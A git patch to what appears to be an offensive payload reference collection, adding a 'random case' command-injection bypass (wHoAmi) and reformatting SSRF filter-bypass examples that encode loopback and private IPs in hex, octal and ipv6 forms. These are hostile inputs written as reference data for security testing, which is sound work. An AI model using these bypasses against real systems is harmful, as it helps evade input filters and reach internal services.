From b391de2117d8a62956515772c006f10ac5b2f962 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 14 Aug 2025 11:09:47 +0200 Subject: [PATCH] Lint fix --- Command Injection/README.md | 9 +++++++++ Server Side Request Forgery/README.md | 5 ++++- 2 files changed, 13 insertions(+), 1 deletion(-) diff --git a/Command Injection/README.md b/Command Injection/README.md index 5a31497..1c05437 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -26,6 +26,7 @@ * [Bypass With $()](#bypass-with--1) * [Bypass With Variable Expansion](#bypass-with-variable-expansion) * [Bypass With Wildcards](#bypass-with-wildcards) + * [Bypass With Random Case](#bypass-with-random-case) * [Data Exfiltration](#data-exfiltration) * [Time Based Data Exfiltration](#time-based-data-exfiltration) * [Dns Based Data Exfiltration](#dns-based-data-exfiltration) @@ -349,6 +350,14 @@ powershell C:\*\*2\n??e*d.*? # notepad @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc ``` +### Bypass With Random Case + +Windows does not distinguish between uppercase and lowercase letters when interpreting commands or file paths. For example, `DIR`, `dir`, or `DiR` will all execute the same `dir` command. + +```powershell +wHoAmi +``` + ## Data Exfiltration ### Time Based Data Exfiltration diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 67de02e..26bc129 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -178,7 +178,9 @@ http://127.0.1 http://0o177.0.0.1/ = http://127.0.0.1 http://q177.0.0.1/ = http://127.0.0.1 ``` - * Hex IP + +* Hex IP + ```powershell http://0x7f000001 = http://127.0.0.1 http://0xc0a80101 = http://192.168.1.1 @@ -205,6 +207,7 @@ http://127.0.1 ### Bypassing via ipv6 hostname * in Linux /etc/hosts contain this line `::1 localhost ip6-localhost ip6-loopback` but work only if http server running in ipv6 + ```powershell http://ip6-localhost = ::1 http://ip6-loopback = ::1